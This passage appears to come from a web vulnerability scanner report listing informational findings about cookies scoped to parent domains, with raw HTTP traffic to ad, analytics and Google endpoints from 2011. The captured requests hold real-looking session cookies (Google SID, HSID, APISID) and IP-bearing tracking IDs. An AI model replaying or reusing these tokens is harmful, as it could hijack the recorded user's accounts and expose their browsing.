Set-Cookie: ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-{w@|M-0_926534-vu@|M-d6_910905-9d[}M-*_925788-AW'~M-0_873769-]|@~M-0_928398-C|@~M-Vp; expires=Thu, 22-Nov-2012 16:10:01 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.49. http://api.wipmania.com/jsonp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.wipmania.com
Path:   /jsonp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: uid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsonp?callback=jsonp1317602099165&_=1317602106541 HTTP/1.1
Host: api.wipmania.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:35:09 GMT
Content-Type: application/x-javascript
Connection: close
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: application/javascript; charset=utf-8
Set-Cookie: uid=xw/qB06JAz2HWy4DCzpOAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.wipmania.com; path=/
Content-Length: 157

jsonp1317602099165({"latitude":"44.9718","longitude":"-113.3405","zoom":3,"address":{"city":"-","country":"United States","country_code":"US","region":"-"}})

13.50. http://apis.google.com/js/plusone.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apis.google.com
Path:   /js/plusone.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: SID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. Note that the cookie is named SID, is issued for .google.com and is given a ten-year lifetime in the response below; a cookie by that name on a Google domain should be treated as a candidate authentication token regardless of the heuristic above, and the finding re-rated if that is confirmed.

Request

GET /js/plusone.js HTTP/1.1
Host: apis.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=F8u0EXbNU4KGhvc02SYfdp-DEFElXzMn6jXCTpOMvEOJYkdCLz3OJlTrIyDS_Aq137v2MBKPkV6-2QEY3WGlenJjN02KGhLt0GGahhHj45EKWRTWFnwTHKW2IIFkuGEp; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjXmxcb1SChjECiXSjEaqO-DnawkdCeNdpQ1eq5H7VQaB1TYoVNaHivfCOnRdR3nNOQ08CAf6CRApbTves9jTDvA3EsEz817LyYCYCbZsTHriQICDzjjFZGK6LqC9xB10_TSh1omi0Cz3S6WTEQKI4YWzinp7wd_vo_RGZ0Q7Pmh8a7ryXTtM1Q9zJgPjGhZAWlQtcmVUtvW6l7weDo9XnzQ4xsrHMoS73ySwvooWqNnqucKMrgZgH8M9keX_Pz9mAcFTAqTRl1KdCO3svISfz05dJpITuMlwLigsrRt_DeV0

Response

HTTP/1.1 200 OK
Set-Cookie: SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjiseRQ5RQhy1HkhvGkXHmsNhgjgFcxIvEQml1xQy4kfn3D8kLNKn65zc1MAG0lQZ9fXoBuBEQv5EZpYNngUVXPJs8CkJJcRIXe7Mv4nXsVmtUd53Kjtci_dg4wZmFbdS0AW4_-GZxkHqFNrF7oBEHAXDX5EInFgoM8uJfPLnmq7RtE08Jv7niuGLAj0uzqGrVCu1FFm4HJYTnPW9Cf3H_wYqq2_t8bjpwOZX7v82cbjjersLVCT9TQrY5ODnCVnC-N_HE7HvI1ocYVAocXOlzaoLWJ_Wb1dvDoeYQr2-aU4c;Domain=.google.com;Path=/;Expires=Thu, 30-Sep-2021 00:09:20 GMT
Content-Type: text/javascript; charset=utf-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Expires: Mon, 03 Oct 2011 00:09:20 GMT
Date: Mon, 03 Oct 2011 00:09:20 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 5319

window.___jsl=window.___jsl||{};
window.___jsl.h=window.___jsl.h||'r;gc\/23980661-3686120e';
window.___jsl.l=[];
window.__GOOGLEAPIS=window.__GOOGLEAPIS||{};
window.__GOOGLEAPIS.gwidget=window.__GOOGL
...[SNIP]...

13.51. http://ar.voicefive.com/b/wc_beacon.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: BMX_G. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1317599974.004,wait-%3E10000,&1317599980689 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; BMX_G=method->-1,ts->1317599953; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:01:20 GMT
Content-Type: image/gif
Connection: close
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1317599974%2E004%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

13.52. http://ar.voicefive.com/bmx3/broker.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: ar_p119936314 and BMX_3PC. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054945&AR_C=43921374 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:00:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=2&initExp=Sun Oct 2 23:59:13 2011&recExp=Mon Oct 3 00:00:22 2011&prad=71054945&arc=43921374&; expires=Sun 01-Jan-2012 00:00:22 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26670

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054945",Pid:"p119936314",Arc:"43921374",Location:C
...[SNIP]...

13.53. http://as.chango.com/links/adunit/1.31759988192e+12

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: _t and cc.i.10449. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "01bddffbb814f8450036212edceb90ccd4fe74e8"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2369
Date: Sun, 02 Oct 2011 23:58:03 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834; Domain=chango.com; expires=Wed, 29 Sep 2021 23:58:02 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:58:02 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript">(new Image()).src = 'http://cm.g.doubleclick.net/pixel?nid=chango&partnerId=&referrerURL=&token=b6ae8
...[SNIP]...

13.54. http://as00.estara.com/fs/ruleaction.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as00.estara.com
Path:   /fs/ruleaction.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: fscookies. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fs/ruleaction.php?accountid=200106297609&urid=79044&cookieurid=&estara_fsguid=5860EEFA281121EC93852AEC182A3278&dnc=1317600784907704486 HTTP/1.1
Host: as00.estara.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsserver__SESSION__=t-501.estara.com; fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEGFjLke6WJJNAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh98VLi0sK2lwYkF9cKjWXdEJSUbAVeUEmfbt9bc9z23--XB-7XiPa.b5v54oJuYNDTOS.bh.3a4Upc7bIKnpkFS4SWEdkFT0SOHgSjEhAsfc4xMhhn8PeTTwRI6yQqJNDDJI9yUb6oGKAvA.gPCGWjs5j3KkNQOUkiGRTzBGXFJFaIV3UC3CJhL2QLgYRT8QT9UQ9IU9okAwqRqropLRo5FRhpLRikF00kkCCuR2ik-JJj0qrGAQ9QSMkOY2CmnIMxndUDsqflNSCD9WDiwrqg0s2Tc7knWN6dY6Tc5yc1TuXForvp1gHEDGMkTZlNmG6IkxXhKmw4AsTjODqqGrkMYjL25VnOrHu.Q8_

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:14 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Pragma: no-cache
Set-Cookie: fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEPHGXI50sSRMAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh94eXFpcUtLkwIL.4VGou6YSkomBP5AWZ9O32tT3Pbf39c33sa41o.-u67Ssm5A4OMZH7un3crhWmzNkiq.iRVbhIYB2RVfRI4OBJMCIBxb7jECOHfQ57N-FEjLBCok4OMUj2JBvpg4oB8j6A8oZYOjqPcac2AJWTIJJNMUdcUkRqhXRRD8AlEvZCuhhEPBFP1BP1hDyhQTKoGKmik9KikVOFkdKKQXbRSAIJ5naITsqVHpVWMQh6gkZIchoFNeUYjHtUNsqflNSCD9WDiwrqg0s2Tc7knWN6dY6Tc5yc1TuXForvp1gHEDGMkTZlNmE6IkxHhKmw4AsTjODqqGrkMYjL25VnOjF1N6J8tFX0Dw__; expires=Sat, 01-Oct-2016 00:13:14 GMT; path=/; domain=.estara.com
Content-Length: 8
Content-Type: text/html; charset=UTF-8

if(0){}

13.55. http://as00.estara.com/fs/rules.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as00.estara.com
Path:   /fs/rules.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: fs_nocache_guid and fscookies. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fs/rules.php?accountid=200106297609&title=Priceline.com%20-%20hotel%2C%20hotel%20reservation%2C%20cheap%20hotel%2C%20las%20vegas%20hotel%2C%20boston%20hotel%2C%20hotel%20deal%2C%20ne&referrer=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2FsearchHotels.do%3Fsession_key%3D711510AC721510AC20111003000909914181269334%26plf%3Dpcln%26INIT_SESSION%3Dtrue%26RefID%3DPLIGOUGO%26RefClickID%3DHOTELSEARCH&w=1920&h=1200&d=16&platform=Win32&ua=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F535.1%20(KHTML%2C%20like%20Gecko)%20Chrome%2F14.0.835.187%20Safari%2F535.1&cs=ISO-8859-1&estara_fsguid=5860EEFA281121EC93852AEC182A3278&estara_firsttime=1317600765&location=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2FsearchResults.do%3Fjsk%3D5463010a5064010a2011100300091519d011589950%26key%3Dgtapcnq5%26showDP%3Dy%26NYOPRedirNI%3Dnull&dnc=1317600769877566774 HTTP/1.1
Host: as00.estara.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; fscookies=b64_XY5LDoMwDERvw67InzjEC85SQYtEF9CqpPevCIlJ69WM33hkAkDwpCokPTKKkIbgmmGM0xapotf3sN7Xz9J716KCei3DTc4FAcktDMh-LYlaS2iRxAnYdNwgk1zmR9z6rJ.vad21dGj7Xee9YEAu4DA-ZBnibZ4SDMpqyWRKMpkqCSxnMpmSBPY18UacR2d-HOa84fqG6zZXE2eEBQIVcpiTaE20kC8_

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:59 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Cache-Control: private, max-age=2592000
Set-Cookie: fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; expires=Sat, 01-Oct-2016 00:13:59 GMT; path=/; domain=.estara.com
Set-Cookie: fscookies=b64_XZNNUsMwDIVvkx0d-drWomdhCnSmLFoYCPfHcWxZaTbx8yc9R5JDAAiJzJT0jIyqZKXIcnlbr78rBfr6c3l8PP7u5yQnNLBk4.GlxxUF7S4MyE8ujbpLOSGpKPiTeUEmfbl9rr-nvv76vj62tWb0-W3d9xUL8gC7OJD7ZX2-XRssxuaRTYzIJkIksM7IJkYkcIokOZGE4t.xi5nDMYejm0QiTlih0CC7mMQiMSdjUDmBbQOobyhsT2PcqA9A5SSI5FO0jEvJSL0Q6qIdQEsmHIUMMYlEIpFoJBoJRUKTGKg4aWKQ2qKZ04ST2opJNtFJAUnutotB6pWelTYxCUaCTkiszIK6CgzmPaob9U8q6sG7GsFVJY3BNZsOzhSdc3l2zgfnfHDW6FxbKLGf4h1AxDRH2pXbpMMR6XBEOhSWYmGCGUIdTc08Bgl5m4pMD0zDjagfPSrCfw__; expires=Sat, 01-Oct-2016 00:13:59 GMT; path=/; domain=.estara.com
Expires: Wed, 02 Nov 2011 00:13:59 GMT
Content-Length: 26084
Content-Type: text/javascript; charset=UTF-8

eStara_obscuration['87123']='bookCreditCardNumber';eStara_obscuration['72139']='offer(.*)CREDIT_CARD_NUM|offer(.*)credit_card|offer(.*)CREDIT_CARD_NUM(.*)';eStara_obscuration['72149']='offer(.*)EXPIRA
...[SNIP]...

13.56. http://asset.userfly.com/users/20826/userfly.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asset.userfly.com
Path:   /users/20826/userfly.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: capture_guid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /users/20826/userfly.js HTTP/1.1
Host: asset.userfly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/map.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 3
Cache-Control: max-age=3600, private, max-stale=3600
Set-Cookie: capture_guid=9c784e4c-ed53-11e0-ab0a-12313b03145d; domain=userfly.com; path=/
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=utf-8


13.57. http://ats.tumri.net/ats/ats

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ats.tumri.net
Path:   /ats/ats

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: t_opt. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ats/ats?cmd=RT&AdvertiserID=3052&platform=T&ActionID=17&ActionName=RTALL&ut1=HOTEL;&ut2=&ut3=BOS&ut4=&ut5=US&cachebuster=1230846595 HTTP/1.1
Host: ats.tumri.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=1653087;type=hotel756;cat=hotel329;u2=BOS;u3=unknown;u4=unknown;u5=0;u6=0;u7=55.26;u13=1;u15=US;u16=34A63N3;ord=1;num=418599216785?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C=-1000424298|547040017; t_opt=OPT-OUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_opt=OPT-OUT; Domain=.tumri.net; Expires=Sat, 21-Oct-2079 03:23:16 GMT; Path=/
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon Oct 03 00:09:09 UTC 2011
Content-Type: image/jpeg
Date: Mon, 03 Oct 2011 00:09:08 GMT
Content-Length: 807

GIF89a....................................................................................................................................3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f....
...[SNIP]...

13.58. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=2102&c3=345&c4=59764&c5=7061&c15=1931%252C357%252C3196%252C996%252C2712%252C553%252C3115&c16=EMON2.EHEX1.SMTC1.FACO1.BMBN1.MIWO2.GNCT1&ns__t=1317599359145&ns_c=UTF-8&c8=Premier%20League%20football%20news%20from%20the%20Barclays%20Premier%20League%20%7C%20Manchester%20United%202-0%20Norwich%20City&c7=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHeadlines%2F0%2C%2C12306~2469333%2C00.html&c9=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHome%2F0%2C%2C12306%2C00.html HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 02 Oct 2011 23:50:07 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 01-Oct-2013 23:50:07 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate


13.59. http://b.scorecardresearch.com/p

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6036211&c3=&c4=&c5=&c6=&c10=&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 02 Oct 2011 23:52:46 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633]]>>; expires=Tue, 01-Oct-2013 23:52:46 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;

13.60. http://b.scorecardresearch.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035250&d.c=gif&d.o=guardiangu-network&d.x=43465411&d.t=page&d.u=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2Fmanchester-united HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 02 Oct 2011 23:51:22 GMT
Connection: close
